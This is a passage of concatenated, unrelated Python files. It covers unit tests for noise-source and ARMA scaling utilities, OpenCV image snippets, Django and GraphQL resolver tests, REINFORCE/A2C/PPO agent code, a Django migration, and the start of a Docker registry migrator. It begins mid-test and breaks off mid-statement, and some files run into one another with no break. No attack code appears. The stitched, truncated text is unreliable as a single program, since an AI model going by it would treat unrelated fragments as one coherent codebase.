np.hstack((y1, y2)) data_exp = self.data[: n1 + n2] np.testing.assert_allclose(y, data_exp) def test_requesting_too_many_items_raises_index_error(self): with self.assertRaises(IndexError): self.src(size=self.n + 1) class TestSourcesStreamStrAndRepr(unittest.TestCase): def setUp(self): rng = np.random.default_rng(2) self.n = 10 self.data = rng.normal(size=self.n) self.src = sources.Stream(self.data) def test_str(self): s = str(self.src) s_exp = f"Stream(data_store={str(self.data)}, ptr_=0)" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = 
f"Stream(data_store={str(self.data)}, ptr_=0)" self.assertEqual(r, r_exp) class TestSourcesGaussianNoise(unittest.TestCase): def test_returned_number_of_samples_matches_size(self): src = sources.GaussianNoise(1) n = 50 y = src(size=n) self.assertEqual(len(y), n) def test_returned_samples_are_random(self): src = sources.GaussianNoise(1) n = 10 y1 = src(size=n) y2 = src(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_init_can_take_default_rng_seed_or_rng(self): seed = 123 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(np.random.default_rng(seed)) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_loc_matters(self): seed = 123 src1 = sources.GaussianNoise(seed, loc=0) src2 = sources.GaussianNoise(seed, loc=1) n = 13 y1 = src1(size=n) y2 = src2(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_scale_matters(self): seed = 123 src1 = sources.GaussianNoise(seed, scale=1) src2 = sources.GaussianNoise(seed, scale=2) n = 13 y1 = src1(size=n) y2 = src2(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_when_scale_is_zero_all_values_equal_loc(self): loc = 0.35 src = sources.GaussianNoise(1, loc=loc, scale=0) n = 10 y = src(size=n) np.testing.assert_allclose(y, loc) def test_default_loc_is_zero(self): seed = 123 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(seed, loc=0) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_default_scale_is_one(self): seed = 1 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(seed, scale=1) n = 12 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_default_seed_is_zero(self): src1 = sources.GaussianNoise() src2 = sources.GaussianNoise(0) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) class TestSourcesGaussianNoiseStrAndRepr(unittest.TestCase): def setUp(self): self.rng = np.random.default_rng(1) self.loc = -0.5 self.scale = 2.3 self.src = sources.GaussianNoise(self.rng, loc=self.loc, scale=self.scale) def test_str(self): s = str(self.src) s_exp = f"GaussianNoise(loc={self.loc}, scale={self.scale})" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = ( f"GaussianNoise(loc={self.loc}, scale={self.scale}, " + f"rng={self.rng})" ) self.assertEqual(r, r_exp) class TestSourcesFixSourceScale(unittest.TestCase): def test_fix_source_scale_does_not_affect_sources_rng_by_default(self): seed = 123 src1 = sources.GaussianNoise(seed) n = 12 u1 = src1(size=n) rng = np.random.default_rng(30) src2 = sources.GaussianNoise(seed) arma = make_random_arma(3, 2, rng, default_source=src2) sources.fix_source_scale(arma) # reset scale src2.scale = 1 u2 = src2(size=n) np.testing.assert_allclose(u1, u2) def test_fix_source_scale_affects_sources_rng_when_use_copy_is_false(self): seed = 123 src1 = sources.GaussianNoise(seed) n = 12 u1 = src1(size=n) rng = np.random.default_rng(30) src2 = sources.GaussianNoise(seed) arma = make_random_arma(3, 2, rng, default_source=src2) sources.fix_source_scale(arma, use_copy=False) # reset scale src2.scale = 1 u2 = src2(size=n) self.assertGreater(np.max(np.abs(u1 - u2)), 1e-3) def test_ar1_output_variance_is_fixed_to_one_by_default(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(1, 0, rng, default_source=src) sources.fix_source_scale(arma, n_samples=5000) ma_var = src.scale ** 2 arma_var = ma_var / (1 - arma.a[0] ** 2) self.assertAlmostEqual(arma_var, 1, 
places=2) def test_ar2_output_variance_is_fixed_to_one_by_default(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) sources.fix_source_scale(arma, n_samples=10000) ma_var = src.scale ** 2 a_diff = 1 - arma.a[1] a_sum = 1 + arma.a[1] arma_var = a_diff * ma_var / (a_sum * (a_diff ** 2 - arma.a[0] ** 2)) self.assertAlmostEqual(arma_var, 1, places=2) def test_scale_varies_in_proportion_to_output_variance(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) var1 = 0.5 sources.fix_source_scale(arma, output_std=var1) scale1 = src.scale var2 = 1.5 sources.fix_source_scale(arma, output_std=var2) scale2 = src.scale self.assertAlmostEqual(var1 / var2, scale1 / scale2, places=2) def test_fix_source_scale_returns_final_scale(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) scale = sources.fix_source_scale(arma) self.assertAlmostEqual(scale, src.scale) class TestSourcesFixTransformerScale(unittest.TestCase): def setUp(self): self.args = (2, 2) self.dummy_source = sources.Constant(1) self.arma = make_random_arma(*self.args, rng=np.random.default_rng(0)) self.arma_alt = make_random_arma( *self.args, rng=np.random.default_rng(0), default_source=self.dummy_source ) def test_scale_matches_that_from_fix_source_scale_with_gaussian_by_default(self): scale = sources.fix_transformer_scale(self.arma) self.arma_alt.default_source = sources.GaussianNoise() scale_alt = sources.fix_source_scale(self.arma_alt) self.assertAlmostEqual(scale, scale_alt) def test_arguments_forwarded_to_fix_source_scale(self): kwargs = {"output_std": 3.5, "n_samples": 500} scale = sources.fix_transformer_scale(self.arma, **kwargs) self.arma_alt.default_source = sources.GaussianNoise() scale_alt = sources.fix_source_scale(self.arma_alt, **kwargs) self.assertAlmostEqual(scale, scale_alt) def test_transformer_source_scaling_is_same_as_return_value(self): scale = sources.fix_transformer_scale(self.arma) self.assertAlmostEqual(scale, self.arma.source_scaling) def test_using_different_source_constructor(self): loc = 1.0 seed = 3 scale = sources.fix_transformer_scale( self.arma, source_constructor=lambda **kwargs: sources.GaussianNoise( loc=loc, rng=seed, **kwargs ), ) self.arma_alt.default_source = sources.GaussianNoise(loc=loc, rng=seed) scale_alt = sources.fix_source_scale(self.arma_alt) self.assertAlmostEqual(scale, scale_alt) def test_initial_source_is_reverted_after_function_call(self): self.assertIs(self.arma_alt.default_source, self.dummy_source) if __name__ == "__main__": unittest.main() import numpy import cv2 cap = cv2.VideoCapture(1) ret = cap.set(3,640) # WIDTH ret = cap.set(4,360) # Height ret = cap.set(5,60) # FPS Frame rate while(True): ret, frame = cap.read() cv2.imshow('raw',frame) cv2.waitKey(1) cap.release() cv2.destroyAllWindows() <filename>authors/apps/authentication/tests/test_social_auth.py<gh_stars>0 from django.test import TestCase from django.urls import reverse from rest_framework import status from rest_framework.test import APIClient class SocialAuthViewTest(TestCase): def setUp(self): self.client = APIClient() self.namespace = 'authentication' self.social_url = reverse(self.namespace + ':social_auth') self.data_no_provider = { "access_token": "<PASSWORD>" } self.data_no_token = { "provider": "google-oauth2" } self.data_no_secret = { "provider": "twitter", 
"access_token": "<PASSWORD>" } # self.data_twitter = { # "provider": "twitter", # "access_token": os.getenv("TWITTER_ACCESS_TOKEN"), # "access_token_secret": os.getenv("TWITTER_ACCESS_SECRET") # } # # self.data_facebook = { # "provider": "facebook", # "access_token": os.getenv("FB_ACCESS_TOKEN") # } # # self.data_google = { # "provider": "google-oauth2", # "access_token": os.getenv("GOOGLE_ACCESS_TOKEN") # } def test_social_auth(self): # res = self.client.post( # self.social_url, # self.data_twitter, # format='json') # # res0 = self.client.post( # self.social_url, # self.data_facebook, # format='json') # # res4 = self.client.post( # self.social_url, # self.data_google, # format='json') res1 = self.client.post( self.social_url, self.data_no_provider, format='json') res2 = self.client.post( self.social_url, self.data_no_token, format='json') res3 = self.client.post( self.social_url, self.data_no_secret, format='json') # self.assertEqual(res.status_code, status.HTTP_201_CREATED) # self.assertEqual(res0.status_code, status.HTTP_201_CREATED) # self.assertEqual(res4.status_code, status.HTTP_201_CREATED) self.assertEqual(res1.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(res2.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(res3.status_code, status.HTTP_400_BAD_REQUEST) <filename>catkin_ws/src/opencv_img_processing/src/opencv1_fundamentals.py #!/usr/bin/env python3 import cv2 """ Open an image """ img = cv2.imread("../images/python_logo.png") cv2.imshow("My Image", img) cv2.waitKey(0) # waits for a specific time in ms until you press any button. 0 means wait forever. """ Print info about image dimensions """ print(f"Shape of img: {img.shape}") print(f"Size (no of px) of img: {img.size}") print(f"Dtype of img: {img.dtype}") """ Crop out a region-of-interest within the entire image """ roi = img[300:400, 400:500] cv2.imshow("ROI", roi) cv2.waitKey(0) """ Save ROI """ cv2.imwrite("./images/roi.png", roi)# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
from __future__ import print_function from future import standard_library standard_library.install_aliases() from builtins import range from builtins import object from multiprocessing import Process from multiprocessing import Queue as MPQueue import numpy as np import sys import logging class MultiThreadedGenerator(object): def __init__(self, generator, num_processes, num_cached_per_queue, seeds=None): if seeds is not None: assert len(seeds) == num_processes else: seeds = [None] * num_processes self.seeds = seeds self.generator = generator self.num_processes = num_processes self.num_cached_per_queue = num_cached_per_queue self._queues = [] self._threads = [] self._end_ctr = 0 self._queue_loop = 0 def __iter__(self): return self def _next_queue(self): r = self._queue_loop self._queue_loop += 1 if self._queue_loop == self.num_processes: self._queue_loop = 0 return r def __next__(self): if len(self._queues) == 0: self._start() try: item = self._queues[self._next_queue()].get() while item == "end": self._end_ctr += 1 if self._end_ctr == self.num_processes: logging.debug("MultiThreadedGenerator: finished data generation") self._finish() raise StopIteration item = self._queues[self._next_queue()].get() return item except KeyboardInterrupt: logging.error("MultiThreadedGenerator: caught exception: {}".format(sys.exc_info())) self._finish() raise KeyboardInterrupt def _start(self): if len(self._threads) == 0: logging.debug("starting workers") self._queue_loop = 0 self._end_ctr = 0 def producer(queue, generator): for item in generator: queue.put(item) queue.put("end") for i in range(self.num_processes): np.random.seed(self.seeds[i]) self._queues.append(MPQueue(self.num_cached_per_queue)) self._threads.append(Process(target=producer, args=(self._queues[i], self.generator))) self._threads[-1].daemon = True self._threads[-1].start() else: logging.debug("MultiThreadedGenerator Warning: start() has been called but workers are already running") def _finish(self): if len(self._threads) != 0: logging.debug("MultiThreadedGenerator: workers terminated") for i, thread in enumerate(self._threads): thread.terminate() self._queues[i].close() self._queues = [] self._threads = [] self._queue = None self._end_ctr = 0 self._queue_loop = 0 def restart(self): self._finish() self._start() def __del__(self): logging.debug("MultiThreadedGenerator: destructor was called") self._finish() <reponame>cassiobotaro/Rivendell<gh_stars>10-100 # Module to get image metadata import cv2 image = cv2.imread('lena.jpg') height, width, channels = image.shape print(f'Width in pixels: {width}') print(f'Height in pixels: {height}') print(f'Qty of channels: {channels}') # Show image using function imshow cv2.imshow('Window\'s name', image) cv2.waitKey(0) # wait to press any key # Save image into disk using function imwrite() cv2.imwrite('output.jpg', image) """Test the mutation resolvers.""" import itertools import json from typing import Any, Dict import pytest from pytest_mock import MockFixture from ceiba.mongo_interface import USERS_COLLECTION from ceiba.mutation_resolvers import ( resolve_mutation_add_job, resolve_mutation_authentication, resolve_mutation_update_job, resolve_mutation_update_job_status, resolve_mutation_update_property) from .utils_test import MockedCollection, read_jobs # Constant to mock the call PARENT = None INFO = None COOKIE = '{"username": "felipeZ", "token": "Token"}' def check_reply(reply: Dict[str, str]) -> None: """Check that the reply has a valid form.""" assert all(x in reply.keys() for x in {"status", 
"text"}) async def run_mutation_update_job( policy: str, new: Dict[str, Any], old: Dict[str, Any]) -> Dict[str, Any]: """Test the resolver for updating jobs.""" args = { "input": new, 'cookie': COOKIE, "duplication_policy": policy } # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(old), "awesome_data": MockedCollection({'data': '{"prop": 42}'})}} reply = await resolve_mutation_update_job(PARENT, args, ctx, INFO) return reply @pytest.mark.asyncio async def test_mutation_add_job(mocker: MockFixture): """Test the resolver for adding jobs.""" job = read_jobs()[1] args = {"input": job, "cookie": COOKIE} # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(job), "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_add_job(PARENT, args, ctx, INFO) check_reply(reply) @pytest.mark.asyncio async def test_mutation_add_nonexisting_job(mocker: MockFixture): """Test the resolver for adding jobs.""" job = read_jobs()[1] args = {"input": job, 'cookie': COOKIE} # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(None), "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_add_job(PARENT, args, ctx, INFO) check_reply(reply) @pytest.mark.asyncio async def test_mutation_update_job(mocker: MockFixture): """Test the resolver for updating jobs.""" mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) # The first job is done the second available done_available = read_jobs() # Test keep policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("KEEP", job1, job2) check_reply(reply) # Test overwrite policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("OVERWRITE", job1, job2) check_reply(reply) # Test merge policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("MERGE", job1, job2) check_reply(reply) @pytest.mark.asyncio async def test_mutation_update_job_status(mocker: MockFixture): """Check the job status updater.""" args = {"input": { "_id": 3141592, "collection_name": "awesome_data", "status": "RESERVED"}, 'cookie': COOKIE } # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(read_jobs())}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_update_job_status(PARENT, args, ctx, INFO) assert reply['status'] == 'DONE' @pytest.mark.asyncio async def test_mutation_update_property(mocker: MockFixture): """Check the job status updater.""" args = {"input": { "_id": 101010, "collection_name": "awesome_data", "data": '{"pi": "3.14159265358979323846"}'}, 'cookie': COOKIE} # Mock database ctx = {"mongodb": { "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_update_property(PARENT, args, ctx, INFO) assert reply['status'] == 'DONE' @pytest.mark.asyncio async def test_mutation_authentication_invalid_token(): """Check the authentication resolver for an invalid_token.""" args = {"token": "InvalidToken"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection(None)}} reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) assert reply['status'] == 
"FAILED" assert "Invalid Token" in reply['text'] @pytest.mark.asyncio async def test_mutation_authentication_invalid_user(mocker: MockFixture): """Check the authentication resolver for an invalid_token.""" args = {"token": "VeryLongToken"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.authenticate_username", return_value="someone") reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) assert reply['status'] == "FAILED" assert "doesn't have permissions" in reply['text'] @pytest.mark.asyncio async def test_mutation_authentication_valid_user(mocker: MockFixture): """Check the authentication resolver for an invalid_token.""" args = {"token": "<PASSWORD>"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection({"username": "RosalindFranklin"})}} mocker.patch("ceiba.mutation_resolvers.authenticate_username", return_value="RosalindFranklin") reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) cookie = json.loads(reply['text']) assert reply['status'] == "DONE" assert cookie['username'] == "RosalindFranklin" async def check_non_authenticated_user(fun, mocker: MockFixture) -> None: """Check that an error message is return if the user is not authenticated.""" args = { 'cookie': COOKIE, } # Mock database ctx = {"mongodb": None} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=False) reply = await fun(PARENT, args, ctx, INFO) assert reply['status'] == "FAILED" assert "The user is not authenticated" in reply['text'] @pytest.mark.asyncio async def test_nonauthenticated_user(mocker: MockFixture): """Check that an error message is return if the user is not authenticated.""" functions = {resolve_mutation_update_job, resolve_mutation_update_job_status, resolve_mutation_update_property, resolve_mutation_add_job} for fun in functions: await check_non_authenticated_user(fun, mocker) # coding: utf-8 """Collection of policy learning algorithms.""" from typing import Optional, Callable from functools import partial import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.utils.data import DataLoader from ignite.engine import Events from irl.exploration.explorer import Explorer from irl.exploration.datasets import Trajectories import irl.algo.trainers as trainers import irl.exploration.transforms as T def create_reinforce( policy: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, exploration: float = 0.001, norm_returns: bool = True, grad_norm_clip: Optional[float] = 1.0, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Reinforce learning algorithm. Parameters ---------- policy: The neural network used to model the policy. optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. exploration: The entropy bonus for encouraging exploration. norm_returns: Whether to normalize the rewards with zero mean and unit variance. Computed over an episode. Raise an error for episode of length 1. grad_norm_clip: Value to clip the norm of the gradient at before applying an update. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- agent: The ignite engine, exploring the environement and optimizing. 
""" policy.to(device=device, dtype=dtype) def select_action(engine: Explorer, observation): policy.train() action_distrib = policy(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy() ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy") @agent.on(Events.STARTED) def add_trajectories_to_engine(engine): engine.state.trajectories = Trajectories( T.WithReturns(discount=discount, norm_returns=norm_returns) ) @agent.on(Events.EPOCH_STARTED) def empty_trajectectories(engine): engine.state.trajectories.clear() @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition) @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): engine.state.trajectories.terminate_trajectory() # The setting is simple enough that using a dataloader is overkill. optimizer.zero_grad() for transition in engine.state.trajectories: loss = -transition.retrn * transition.log_prob loss -= exploration * transition.entropy loss.backward() if grad_norm_clip is not None: nn.utils.clip_grad_norm_(policy.parameters(), grad_norm_clip) optimizer.step() return agent def create_a2c( actor_critic: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, exploration: float = 0.001, norm_returns: bool = True, critic_loss: Callable = F.mse_loss, critic_multiplier: float = 1.0, grad_norm_clip: Optional[float] = 1.0, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Reinforce learning algorithm. Parameters ---------- actor_critic: The neural network used to model the policy and critic. Must return a tuple (action probalility distribution, critic value). optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. exploration: The entropy bonus for encouraging exploration. norm_returns: Whether to normalize the rewards with zero mean and unit variance. Computed over an episode. Raise an error for episode of length 1. critic_loss: The loss function used to learn the critic. critic_multiplier: Multiplier used for the critic loss in the total loss. grad_norm_clip: Value to clip the norm of the gradient at before applying an update. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- agent: The ignite engine, exploring the environement and optimizing. 
""" actor_critic.to(device=device, dtype=dtype) def select_action(engine, observation): actor_critic.train() action_distrib, critic_value = actor_critic(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy(), critic_value=critic_value, ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy", "critic_value") @agent.on(Events.STARTED) def add_trajectories_to_engine(engine): engine.state.trajectories = Trajectories( T.WithReturns(discount=discount, norm_returns=norm_returns) ) @agent.on(Events.EPOCH_STARTED) def empty_trajectectories(engine): engine.state.trajectories.clear() @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition) @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): engine.state.trajectories.terminate_trajectory() # The setting is simple enough that using a dataloader is overkill. optimizer.zero_grad() for t in engine.state.trajectories: loss = -(t.retrn - t.critic_value.detach()) * t.log_prob loss -= exploration * t.entropy retrn = t.critic_value.new([t.retrn]) # Make tensor on same device loss += critic_multiplier * critic_loss(t.critic_value, retrn) loss.backward() if grad_norm_clip is not None: nn.utils.clip_grad_norm_(actor_critic.parameters(), grad_norm_clip) optimizer.step() return agent def create_ppo( actor_critic: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, lambda_: float = 0.9, ppo_clip: float = 0.02, exploration_loss_coef: float = 0.001, critic_loss_coef: float = 1.0, critic_loss_function: Callable = F.mse_loss, norm_returns: bool = True, norm_gaes: bool = True, dataset_size: int = 1024, n_epochs: int = 10, # FIXME change the way the dataloader is passed on to the function batch_size: int = 16, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Proximal Policy Optimization learning algorithm. Parameters ---------- actor_critic: The neural network used to model the policy and critic. Must return a tuple (action probalility distribution, critic value). optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. lambda_: Lambda discount as defined in Generalized Advantage Estimation. ppo_clip: Clip parameter for the PPO loss. exploration_loss_coef: The entropy bonus for encouraging exploration. critic_loss_coef: Mutiplier for the critic loss. critic_loss_function: Loss function used by the critic. norm_returns: Whether to normalize returns. Running averages are kept per task (use `task_id` to differentiate tasks) and used to scale back critic for bootstrapping and GAEs. norm_gaes: Whether to normalize the advantages. Independant from the normalization of returns that is used to scale back the critic. This happens on the final advantages. dataset_size: Size of the PPO dataset to collect information from agents. n_epoch: Number of epoch of optimization to be on a single PPO dataset. batch_size: Batch size used to optimized over the PPO dataset. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- The ignite engine, exploring the environement and optimizing. 
""" actor_critic.to(device=device, dtype=dtype) def select_action(engine, observation): with torch.no_grad(): actor_critic.eval() action_distrib, critic_value = actor_critic(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy(), critic_value=critic_value, ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy", "critic_value") trainer = trainers.create_ppo_trainer( actor_critic=actor_critic, optimizer=optimizer, ppo_clip=ppo_clip, exploration_loss_coef=exploration_loss_coef, critic_loss_coef=critic_loss_coef, critic_loss_function=critic_loss_function, device=device, dtype=dtype, ) @agent.on(Events.STARTED) def add_trajectories_and_trainer_to_engine(engine): engine.state.trajectories = Trajectories( T.compose( T.WithGAEs( discount=discount, lambda_=lambda_, norm_gaes=norm_gaes, norm_returns=norm_returns, ), partial(map, T.PinIfCuda(device=device)), ) ) engine.state.trainer = trainer @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition.cpu()) @agent.on(Events.EPOCH_COMPLETED) def terminate_trajectory_and_data_collection(engine): engine.state.trajectories.terminate_trajectory() @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): if len(engine.state.trajectories) >= dataset_size: sample_elem = engine.state.trajectories[0] dataloader = DataLoader( dataset=engine.state.trajectories, batch_size=batch_size, collate_fn=sample_elem.__class__.collate, drop_last=True, ) engine.state.trainer.run(dataloader, n_epochs) engine.state.trajectories.clear() return agent <filename>bluebottle/mails/migrations/0003_auto_20180727_1122.py # -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2018-07-27 09:22 from __future__ import unicode_literals from django.db import migrations def create_settings(apps, schema_editor): MailPlatformSettings = apps.get_model('mails', 'MailPlatformSettings') if not MailPlatformSettings.objects.count(): MailPlatformSettings.objects.create() def backward(apps, schema_editor): pass class Migration(migrations.Migration): dependencies = [ ('mails', '0002_auto_20171211_1117'), ] operations = [ migrations.RunPython(create_settings, backward) ] import argparse import logging import sys import Queue from migrator.Migrator import Migrator from migrator.ArtifactoryDockerAccess import ArtifactoryDockerAccess from migrator.DockerRegistryAccess import DockerRegistryAccess from migrator.QuayAccess import QuayAccess from migrator.DTRAccess import DTRAccess import os import shutil dir_path = os.path.dirname(os.path.realpath(__file__)) ''' Entry point and argument parser for Docker to Artifactory migrator Supports: generic - Migrate from a generic, token based registry. ecr - Migrate from an Amazon Elastic Container Registry quay - Migrate from a SaaS Quay registry. quayee - Migrate from Quay Enterprise. ''' # Globals NUM_OF_WORKERS = 2 MIN_NUM_OF_WORKERS = 1 MAX_NUM_OF_WORKERS = 16 def add_extra_args(parser): parser.add_argument('--ignore-certs', dest='ignore_cert', action='store_const', const=True, default=False, help='Ignore any certificate errors from both source and destination') parser.add_argument('--overwrite', action='store_true', help='Overwrite existing image/tag on the destination') parser.add_argument('--num-of-workers', dest='workers', type=int, default=NUM_OF_WORKERS, help='Number of worker threads. Defaults to %d.' 
% NUM_OF_WORKERS) parser.add_argument('-v', '--verbose', action='store_true', help='Make the operation more talkative') # Provide a predefined set of images to import parser.add_argument('--image-file', dest='image_file', help='Limit the import to a set of images in the provided file. ' 'Format of new line separated file: \'<image-name>:<tag>\' OR ' '\'<image-name>\' to import all tags of that repository.') def add_art_access(parser): art_group = parser.add_argument_group('artifactory') art_group.add_argument('artifactory', help='The destination Artifactory URL') art_group.add_argument('username', help='The username to use for authentication to Artifactory') art_group.add_argument('password', help='The password to use for authentication to Artifactory') art_group.add_argument('repo', help='The docker repository in Artifactory to store the images') # Sets up the argument parser for the application def get_arg_parser(): parser = argparse.ArgumentParser(prog='python DockerMigrator.py', description='Docker registry to Artifactory migrator.') # Generic Registry Parser subparsers = parser.add_subparsers(help='sub-command help') parser_generic = subparsers.add_parser('generic', help='A generic tool to migrate a single registry') # Source registry access source_group = parser_generic.add_argument_group('source') source_group.add_argument('source', help='The source registry URL') source_group.add_argument('--source-username', help='The username to use for authentication to the source') source_group.add_argument('--source-password', help='The password to use for authentication to the source') # Artifactory access add_art_access(parser_generic) # Extra options add_extra_args(parser_generic) parser_generic.set_defaults(func=generic_migration) # ECR parser_ecr = subparsers.add_parser('ecr', help='A tool to migrate from Amazon Elastic Container Registry (ECR)') # Source registry access source_group = parser_ecr.add_argument_group('source') source_group.add_argument('source', help='The source registry URL') source_group.add_argument('token', help='The token generated by the aws tool') # Artifactory access add_art_access(parser_ecr) # Extra options add_extra_args(parser_ecr) parser_ecr.set_defaults(func=ecr_migration) # DTR parser_dtr = subparsers.add_parser('dtr', help='A tool to migrate from Docker Trusted Registry (DTR)') # Source registry access source_group = parser_dtr.add_argument_group('source') source_group.add_argument('source', help='The DTR registry URL') source_group.add_argument('dtr_username', help='The username of a DTR admin') source_group.add_argument('dtr_password', help='The DTR admin password or token') # Artifactory access add_art_access(parser_dtr) # Extra options add_extra_args(parser_dtr) parser_dtr.set_defaults(func=dtr_migration) # GCR parser_gcr = subparsers.add_parser('gcr', help='A tool to migrate from Google Container Registry (GCR)') # Source registry access source_group = parser_gcr.add_argument_group('source') source_group.add_argument('--source', help='The source registry URL (defaults to https://gcr.io)', default='https://gcr.io') source_group.add_argument('keyfile', help='The Google JSON key file') # Artifactory access add_art_access(parser_gcr) # Extra options add_extra_args(parser_gcr) parser_gcr.set_defaults(func=gcr_migration) # QUAY parser_quay = subparsers.add_parser('quay', help='A tool specifically for Quay SaaS') quay = parser_quay.add_argument_group('source') quay.add_argument('namespace', help='The username or organization to import repositories from') 
quay.add_argument('token', help='The OAuth2 Access Token') # Artifactory access add_art_access(parser_quay) # Extra options add_extra_args(parser_quay) parser_quay.set_defaults(func=quay_migration) # Quay enterprise parser_quay_ee = subparsers.add_parser('quayee', help='A tool specifically for Quay Enterprise') quay_ee = parser_quay_ee.add_argument_group('source') quay_ee.add_argument('source', help='The source registry URL') quay_ee.add_argument('--source-username', help='The super user username') quay_ee.add_argument('--source-password', help='The super user password') quay_ee.add_argument('--token', help='The OAuth2 Access Token') # Artifactory access add_art_access(parser_quay_ee) # Extra options add_extra_args(parser_quay_ee) parser_quay_ee.set_defaults(func=quay_ee_migration) return parser ''' Parse image file Returns two different lists, one with just image names and one with image/tag tuple. Example: Input file: image_name1 image_name2, image_name3:tag1 image_name4:tag2 Result: [image_name1, image_name2,...], [(image_name3, tag1), (image_name4, tag2),...] ''' def parse_image_file(file_path): image_names = [] images = [] try: with open(file_path) as f: content = f.readlines() for unprocessed_line in content: line = unprocessed_line.strip() if ':' in line: name, tag = line.split(':') if name and tag: images.append((name, tag)) elif len(line) > 0: image_names.append(line) return image_names, images except Exception as ex: logging.error("Unable to read in image file '%s' due to %s" % (file_path, str(ex))) return [], [] def parse_key_file(file_path): try: with open(file_path) as f: content = f.read() return content except Exception as ex: logging.error("Unable to read in key file '%s' due to %s" % (file_path, str(ex))) return None ''' Generic migration for a V2 token based Docker registry @param args - The user provided arguments @param work_dir - The temporary work directory @registry - The source registry (for info only) ''' def generic_migration(args, work_dir, registry="generic"): # Verify the more intricate argument requirements if bool(args.source_username) != bool(args.source_password): parser.error("--source-username and --source-password must both be provided or neither.") if args.workers < MIN_NUM_OF_WORKERS or args.workers > MAX_NUM_OF_WORKERS: parser.error("--num-of-workers must be between %d and %d." % 